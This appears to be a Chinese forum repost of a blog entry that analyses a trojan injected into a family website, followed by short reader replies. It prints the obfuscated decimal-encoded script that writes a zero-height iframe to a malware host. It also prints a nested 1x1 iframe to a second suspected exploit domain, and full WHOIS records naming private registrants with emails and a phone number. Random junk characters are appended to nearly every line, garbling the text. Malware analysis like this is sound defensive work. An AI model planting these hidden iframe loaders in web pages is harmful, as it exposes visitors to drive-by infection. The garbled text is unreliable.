[原创]一篇刚写的分析木马手记

首发在我的博客里面， ([ -i5  
iPkCuLQ}  
http://www.areway.cn/?p=175 p_(En4QSH  
oR,6esA+6n  
)$1>6C\  
周末上线鸭子就Q我说他的站给挂了马，当时没太注意就直接打开了连接，截下了网页源码： V[uSo$k+>  
          gb|;]mk*"  
<script>t=’60,105,102,114,97,109,101, R :(-"GW'  
32,115,114,99,61,104,116,116,112,58,47,47, 7~F~'
V  
102,114,101,101,46,117,45,117,117,117,46,99, cdh0b7tjn  
110,47,101,114,114,111,114,46,104,116,109, :o .+<_&  
32,119,105,100,116,104,61,49,48,48,32,104, 1]eRragm"  
101,105,103,104,116,61,48,62,60,47,105,102, ;-XfbqZ\  
114,97,109,101,62′; &^#u=w?^x  
t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script> O$}.b=N9  
                                                                                                  9^ZtbmUf
 
<script>t=’60,105,102,114,97,109,101,32,115, k=[s%O6H  
114,99,61,104,116,116,112,58,47,47,102,114, fBctG~CJH  
101,101,46,117,45,117,117,117,46,99,110,47, ,oh;(|=  
101,114,114,111,114,46,104,116,109,32,119, aZCq{7Xs  
105,100,116,104,61,49,48,48,32,104,101,105, Dsp$Nr
%*  
103,104,116,61,48,62,60,47,105,102,114,97, vXRY/Zzj1  
109,101,62′;t=eval(’String.fromCharCode(’+t+’)'); jeJgDAUv  
document.write(t);</script> e).;;0  
                                                                                                  FOk;=+  
<html xmlns=” 2jC`'8  
http://www.w3.org/1999/xhtml 5K2K'ZkI  
“>  u\L}B!  
<head> 5.oIyC^Ik  
<!– Published By Newasp.cc 2007-12-7-18:03:23 –> L/r_MtN  
<meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ /> qSB&Q0T  
<title>首页 - 爱生活家庭网 4|E^ #C  
                                                                                                                                                    a!E22k?((z  
上面有一段 script的十进制加密字段，里面的大概内容是，把所有的字符放在函数t里面，最后用doucment.write(t)来把字符串写在网页里面。 4$[o;t>  
转换字符串后的大概内容是（谁点击后果自付）： 8"9&x} tl-  
<script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=……… |[IyqWG9  
                                                                                                                                  w\YS5!P,V  
查询玉米u-uuu.cn的详细信息： `H6~<9r  
Domain Name: u-uuu.cn U
]~@_j  
ROID: 20070901s10001s64972306-cn ;_)~h$1%=  
Domain Status: ok Leb|YX
 
Registrant Organization: 王雷 HyU:BW;  
Registrant Name: 王雷 6<<"9mxK  
Administrative Email: czlovexs@126.com (+epRC  
Sponsoring Registrar: 北京万网志成科技有限公司 \agZD+  
Name Server:ns.yovole.com Ly+UY.v"  
Name Server:ns1.yovole.com R-S<7Q3E0=  
Registration Date: 2007-09-01 17:54 9+^)?JUYll  
Expiration Date: 2008-09-01 17:54 /oHCV0!0  
最后PING了一下地址 都没有什么…. JEp)8{.bW8  
                                                                                                _(F-(X|  
上虚拟机里面继续分析，IE里面打开上面的连接…查看源代码…..直接又有嵌套. 3X`9&0:j%  
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe> {h7 vJ^  
<script language=”javascript” src=” QMsq4yJ)%  
http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script gCb+hQq\  
> w3(|A> s3  
这个玉米应该有可能是木马作者的： DFK@/.V  
foafau.info的详细信息： ^w\22 Q  
Access to INFO WHOIS information is provided to assist persons in );7 d_#  
determining the contents of a domain name registration record in the .Q,"gsY  
Afilias registry database. The data in this record is provided by @@Ybg6.+*  
Afilias Limited for informational purposes only, and Afilias does not D4!;*2t  
guarantee its accuracy.  This service is intended only for query-based FOsd{Fw  
access. You agree that you will use this data only for lawful purposes dZ`Y>wH_  
and that, under no circumstances will you use this data to: (a) allow, P_1WJ  
enable, or otherwise support the transmission by e-mail, telephone, or %Hbq3U30  
facsimile of mass unsolicited, commercial advertising or solicitations j8` B  
to entities other than the data recipient’s own existing customers; or W^tD6H;  
(b) enable high volume, automated, electronic processes that send j2MA['{  
queries or data to the systems of Registry Operator, a Registrar, or 9j>2C  
Afilias except as reasonably necessary to register domain names or -[7+g  
modify existing registrations. All rights reserved. Afilias reserves #cfiN b}GX  
the right to modify these terms at any time. By submitting this query, 4d@yAr}  
you agree to abide by this policy. G;G*!nlWf  
Domain ID:D22418703-LRMS .[O{,
r  
Domain Name:FOAFAU.INFO _-_iw&F  
Created On:20-Nov-2007 16:05:42 UTC a|7C6#iz$  
Last Updated On:20-Nov-2007 16:05:44 UTC [<RhaZz  
Expiration Date:20-Nov-2008 16:05:42 UTC ?$f.[;mh  
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) $vegU]-R  
Status:CLIENT DELETE PROHIBITED :W*yfhLt  
Status:CLIENT RENEW PROHIBITED rv*{[K  
Status:CLIENT TRANSFER PROHIBITED )}@D\(/@  
Status:CLIENT UPDATE PROHIBITED F] c\Qt  
Status:TRANSFER PROHIBITED Vke<; k-  
Registrant ID:GODA-040110615 F}_b7|^  
Registrant Name:liu hong oe|#!SM(  
Registrant Organization: 6!m#;8 4  
Registrant Street1:beijing kXwAw]ogN  
Registrant Street2: *-nO,K>y`  
Registrant Street3: 5^g*  
Registrant City:beijing mAW.p=;  
Registrant State/Province: bw P=f.  
Registrant Postal Code:100000 = j1Jl^[  
Registrant Country:CN ,_e[P  
Registrant Phone:+86.860108888777 ="voJgvw  
Registrant Phone Ext.: MbRTOH  
Registrant FAX: BIWe Hx  
Registrant FAX Ext.: zEI+)|4?r  
Registrant Email:bbbshiji@163.com {cXr!N^K  
Admin ID:GODA-240110615 xS,24{-HJ  
Admin Name:liu hong *:n~j9V-  
Admin Organization: Z3S+")^  
Admin Street1:beijing fN&\8SPE  
Admin Street2: GTdoUSUq  
Admin Street3: 3a?-UT!  
Admin City:beijing T8o](:B~  
Admin State/Province: "2cOSPpQL  
Admin Postal Code:100000 Ul}RT xJ
 
Admin Country:CN Y2r}W3F=  
Admin Phone:+86.860108888777 ;qWu8\T+  
Admin Phone Ext.: 9
J3fiA_  
Admin FAX: 6.D|\;9{c  
Admin FAX Ext.: XGl2rX&  
Admin Email:bbbshiji@163.com 5#DMizv6  
Billing ID:GODA-340110615 io4<HN  
Billing Name:liu hong !D??Y^6bI  
Billing Organization: V`I4"}M1  
Billing Street1:beijing /$c8
7\  
Billing Street2: "to!&@I| 4  
Billing Street3: 3ahriZe  
Billing City:beijing =KPmZ,/w  
Billing State/Province: VX)8pV$  
Billing Postal Code:100000 X$kLBG_  
Billing Country:CN Y|tHU'x  
Billing Phone:+86.860108888777 "| nXR8t.r  
Billing Phone Ext.: b31$i 5{  
Billing FAX: V(S7mA:T  
Billing FAX Ext.: +<bj}"  
Billing Email:bbbshiji@163.com YSnh2 Bq  
Tech ID:GODA-140110615 H{}&|;0  
Tech Name:liu hong tc~gn!"  
Tech Organization: b**vU
t\  
Tech Street1:beijing ^|/mn!7wD  
Tech Street2: ifn=De3+  
Tech Street3: *V&M5  
Tech City:beijing =4_}.  
Tech State/Province: }c,b]!:  
Tech Postal Code:100000 8qe[x\,"8  
Tech Country:CN
7 A0?tG  
Tech Phone:+86.860108888777 dk&F?B{6T  
Tech Phone Ext.: w{tA{{  
Tech FAX: \,;glY=M!  
Tech FAX Ext.: v`4w=!4  
Tech Email:bbbshiji@163.com V!:!c]8F  
Name Server:NS27.DOMAINCONTROL.COM m>uG{4<-  
Name Server:NS28.DOMAINCONTROL.COM W|<c[S  
Name Server: dS1HA>c)O  
Name Server: J4qk^1m.  
Name Server: FVXsu!R  
Name Server: zjoo;(?D|  
Name Server: u|<?mA!  
Name Server: )G48,.
"  
Name Server: y[McdlH m  
Name Server: 5*z>ez2YQ7  
Name Server: *~8F.c
x  
Name Server: )
"TVR{I%B  
Name Server: &N.pW=%,N  
                                                                                                          9~V'Wev  
接着下载每个文件里面的代码： ~<k>07  
一步一步看..  kF1$  
~W@dF~r  
{t;o^pUF  
xOkdu
k]  
CVO_F=;  
EC,,l'%a|/  
都是十进制的代码，也懒得再分析了，有这个爱好的大家可以继续试试

要是有全部 就好了 传上来

看过了就是没看懂。。。